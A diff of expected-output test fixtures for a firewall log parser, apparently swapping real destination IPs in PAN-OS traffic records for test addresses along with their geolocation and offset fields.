-        "log.offset": 13864,
+        "log.offset": 13818,
         "network.application": "dns",
         "network.bytes": 80,
         "network.community_id": "1:QYDqyZAUrBKpnIVn+epBn1ew/so=",
@@ -3941,16 +3731,17 @@
         "client.ip": "192.168.0.100",
         "client.packets": 1,
         "client.port": 38796,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 111,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "event.action": "flow_terminated",
@@ -3963,7 +3754,7 @@
         "event.end": "2012-04-10T04:39:24.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:24.000-02:00",
         "event.timezone": "-02:00",
@@ -3974,10 +3765,10 @@
         ],
         "fileset.name": "panos",
         "input.type": "log",
-        "log.offset": 14217,
+        "log.offset": 14171,
         "network.application": "dns",
         "network.bytes": 206,
-        "network.community_id": "1:shHCpyazCigToSNjn/e4N7P4biU=",
+        "network.community_id": "1:pMMIMicfrENbfeypsdzAPcSdfIs=",
         "network.direction": "outbound",
         "network.packets": 2,
         "network.transport": "udp",
@@ -4008,12 +3799,12 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "192.168.0.100",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.0.100"
         ],
         "rule.name": "rule1",
         "server.bytes": 111,
-        "server.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
         "server.packets": 1,
         "server.port": 53,
         "service.type": "panw",
@@ -4035,14 +3826,7 @@
         "client.port": 59200,
         "client.user.name": "crusher",
         "destination.address": "62.211.68.12",
-        "destination.as.number": 3269,
-        "destination.as.organization.name": "Telecom Italia",
         "destination.bytes": 906,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IT",
-        "destination.geo.country_name": "Italy",
-        "destination.geo.location.lat": 43.1479,
-        "destination.geo.location.lon": 12.1097,
         "destination.ip": "62.211.68.12",
         "destination.packets": 7,
         "destination.port": 80,
@@ -4068,7 +3852,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 14556,
+        "log.offset": 14515,
         "network.application": "web-browsing",
         "network.bytes": 1503,
         "network.community_id": "1:cDqhuLJdpDu0NsYQNFC3GAMS3GQ=",
@@ -4133,17 +3917,7 @@
         "client.packets": 10,
         "client.port": 48412,
         "destination.address": "50.19.102.116",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 5013,
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "50.19.102.116",
         "destination.packets": 7,
         "destination.port": 443,
@@ -4168,7 +3942,7 @@
         ],
         "fileset.name": "panos",
         "input.type": "log",
-        "log.offset": 14933,
+        "log.offset": 14892,
         "network.application": "paloalto-wildfire-cloud",
         "network.bytes": 5817,
         "network.community_id": "1:uf1iUYRFFiUYttG2AFf4pcXOdjw=",
@@ -4229,17 +4003,7 @@
         "client.port": 47752,
         "client.user.name": "crusher",
         "destination.address": "65.55.223.19",
-        "destination.as.number": 8075,
-        "destination.as.organization.name": "Microsoft Corporation",
         "destination.bytes": 99,
-        "destination.geo.city_name": "Washington",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.7095,
-        "destination.geo.location.lon": -78.1539,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "65.55.223.19",
         "destination.packets": 1,
         "destination.port": 40026,
@@ -4265,7 +4029,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 15331,
+        "log.offset": 15290,
         "network.application": "skype-probe",
         "network.bytes": 286,
         "network.community_id": "1:XF4dVSWPB46mtqr78f9EFUDEn6I=",
@@ -4331,17 +4095,7 @@
         "client.port": 47752,
         "client.user.name": "crusher",
         "destination.address": "65.55.223.24",
-        "destination.as.number": 8075,
-        "destination.as.organization.name": "Microsoft Corporation",
         "destination.bytes": 902,
-        "destination.geo.city_name": "Washington",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.7095,
-        "destination.geo.location.lon": -78.1539,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "65.55.223.24",
         "destination.packets": 1,
         "destination.port": 40029,
@@ -4367,7 +4121,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 15696,
+        "log.offset": 15655,
         "network.application": "skype-probe",
         "network.bytes": 978,
         "network.community_id": "1:HEEGx0vjlpNA8Pw0s6pBr2v0rpo=",
@@ -4431,16 +4185,17 @@
         "client.ip": "192.168.0.100",
         "client.packets": 1,
         "client.port": 52189,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 141,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "event.action": "flow_terminated",
@@ -4453,7 +4208,7 @@
         "event.end": "2012-04-10T04:39:24.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:24.000-02:00",
         "event.timezone": "-02:00",
@@ -4464,10 +4219,10 @@
         ],
         "fileset.name": "panos",
         "input.type": "log",
-        "log.offset": 16061,
+        "log.offset": 16020,
         "network.application": "dns",
         "network.bytes": 227,
-        "network.community_id": "1:1CvVfwyezBZcR2u+VcrEzfuQK9s=",
+        "network.community_id": "1:OzPcYfTB9qZdptdWIWtui31Th2Q=",
         "network.direction": "outbound",
         "network.packets": 2,
         "network.transport": "udp",
@@ -4498,12 +4253,12 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "192.168.0.100",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.0.100"
         ],
         "rule.name": "rule1",
         "server.bytes": 141,
-        "server.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
         "server.packets": 1,
         "server.port": 53,
         "service.type": "panw",
@@ -4524,19 +4279,15 @@
         "client.packets": 1,
         "client.port": 59300,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -4549,7 +4300,7 @@
         "event.end": "2012-04-10T04:39:54.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:54.000-02:00",
         "event.timezone": "-02:00",
@@ -4561,10 +4312,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 16400,
+        "log.offset": 16364,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:YDMNSbru670DK5EMT3E28WFJPz4=",
+        "network.community_id": "1:p332Xv4lcmlBtHbVIre7h23l+pw=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -4596,14 +4347,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -4627,14 +4378,7 @@
         "client.port": 54414,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -4660,7 +4404,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 16764,
+        "log.offset": 16726,
         "network.application": "dns",
         "network.bytes": 73,
         "network.community_id": "1:K6PPTb7ohj/4wQV86uCrgAF1mcY=",
@@ -4725,19 +4469,15 @@
         "client.packets": 1,
         "client.port": 59299,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -4750,7 +4490,7 @@
         "event.end": "2012-04-10T04:39:53.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:53.000-02:00",
         "event.timezone": "-02:00",
@@ -4762,10 +4502,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 17117,
+        "log.offset": 17079,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:C9009xCOuCuGvMPT4caMCizoYr0=",
+        "network.community_id": "1:iwp6f2j4DuzqklbsQ3X/ysmCjlM=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -4797,14 +4537,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -4828,14 +4568,7 @@
         "client.port": 60399,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -4861,7 +4594,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 17481,
+        "log.offset": 17441,
         "network.application": "dns",
         "network.bytes": 80,
         "network.community_id": "1:BKNHj3e0QZpWJwLNiG4yqJnbrxk=",
@@ -4927,14 +4660,7 @@
         "client.port": 59626,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 316,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 2,
         "destination.port": 53,
@@ -4960,7 +4686,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 17834,
+        "log.offset": 17794,
         "network.application": "dns",
         "network.bytes": 482,
         "network.community_id": "1:RQ3lmwvSayYq24fFbjpDDqDG+Dg=",
@@ -5026,14 +4752,7 @@
         "client.port": 51542,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 121,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 1,
         "destination.port": 53,
@@ -5059,7 +4778,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 18189,
+        "log.offset": 18149,
         "network.application": "dns",
         "network.bytes": 196,
         "network.community_id": "1:g5ixoTtR3QVz4le7g1L6PZ67CmU=",
@@ -5125,14 +4844,7 @@
         "client.port": 54182,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 169,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 1,
         "destination.port": 53,
@@ -5158,7 +4870,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 18543,
+        "log.offset": 18503,
         "network.application": "dns",
         "network.bytes": 244,
         "network.community_id": "1:z0genl/l2JGIJaNTqaSLGCLTlo4=",
@@ -5224,14 +4936,7 @@
         "client.port": 59199,
         "client.user.name": "crusher",
         "destination.address": "62.211.68.12",
-        "destination.as.number": 3269,
-        "destination.as.organization.name": "Telecom Italia",
         "destination.bytes": 954,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IT",
-        "destination.geo.country_name": "Italy",
-        "destination.geo.location.lat": 43.1479,
-        "destination.geo.location.lon": 12.1097,
         "destination.ip": "62.211.68.12",
         "destination.packets": 7,
         "destination.port": 80,
@@ -5257,7 +4962,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 18897,
+        "log.offset": 18857,
         "network.application": "web-browsing",
         "network.bytes": 1548,
         "network.community_id": "1:cIfWskY1iVpg8gxVVTX1K8A7+MA=",
@@ -5323,17 +5028,7 @@
         "client.port": 59198,
         "client.user.name": "crusher",
         "destination.address": "212.48.10.58",
-        "destination.as.number": 8660,
-        "destination.as.organization.name": "Italiaonline S.p.A.",
         "destination.bytes": 9130,
-        "destination.geo.city_name": "Assago",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IT",
-        "destination.geo.country_name": "Italy",
-        "destination.geo.location.lat": 45.4087,
-        "destination.geo.location.lon": 9.1225,
-        "destination.geo.region_iso_code": "IT-MI",
-        "destination.geo.region_name": "Milan",
         "destination.ip": "212.48.10.58",
         "destination.packets": 10,
         "destination.port": 80,
@@ -5359,7 +5054,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 19272,
+        "log.offset": 19232,
         "network.application": "web-browsing",
         "network.bytes": 10135,
         "network.community_id": "1:UPWyVvocuULCMUmJlrn6XBha7JE=",
@@ -5424,19 +5119,15 @@
         "client.packets": 18,
         "client.port": 56856,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 555,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 3,
         "destination.port": 80,
         "event.action": "flow_terminated",
@@ -5449,7 +5140,7 @@
         "event.end": "2012-04-10T04:38:23.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
+        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:29:51.000-02:00",
         "event.timezone": "-02:00",
@@ -5461,10 +5152,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 19646,
+        "log.offset": 19606,
         "network.application": "web-browsing",
         "network.bytes": 1918,
-        "network.community_id": "1:jFqkUdvAr9S/yeKacw5dlE+0/o0=",
+        "network.community_id": "1:o5dLJ54EAYPujmRFnlgi5qBdlrM=",
         "network.direction": "outbound",
         "network.packets": 21,
         "network.transport": "tcp",
@@ -5496,14 +5187,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 555,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 3,
         "server.port": 80,
         "service.type": "panw",
@@ -5527,14 +5218,7 @@
         "client.port": 52489,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -5560,7 +5244,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 20028,
+        "log.offset": 19986,
         "network.application": "dns",
         "network.bytes": 80,
         "network.community_id": "1:dQTHsEW3omlFoTmdZu1fchcTb9c=",
@@ -5625,19 +5309,15 @@
         "client.packets": 1,
         "client.port": 59298,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -5650,7 +5330,7 @@
         "event.end": "2012-04-10T04:39:53.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:53.000-02:00",
         "event.timezone": "-02:00",
@@ -5662,10 +5342,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 20381,
+        "log.offset": 20339,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:BG6Rk6e+H9jRcZHXqRPFG4iA3uU=",
+        "network.community_id": "1:s7wyS51RPURVN0hpBPCJ/Lberv0=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -5697,14 +5377,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -5728,14 +5408,7 @@
         "client.port": 60185,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -5761,7 +5434,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 20745,
+        "log.offset": 20701,
         "network.application": "dns",
         "network.bytes": 76,
         "network.community_id": "1:eLVg5C7+4Gz+x6GBj4MlJHk/vyk=",
@@ -5827,14 +5500,7 @@
         "client.port": 51817,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -5860,7 +5526,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 21098,
+        "log.offset": 21054,
         "network.application": "dns",
         "network.bytes": 76,
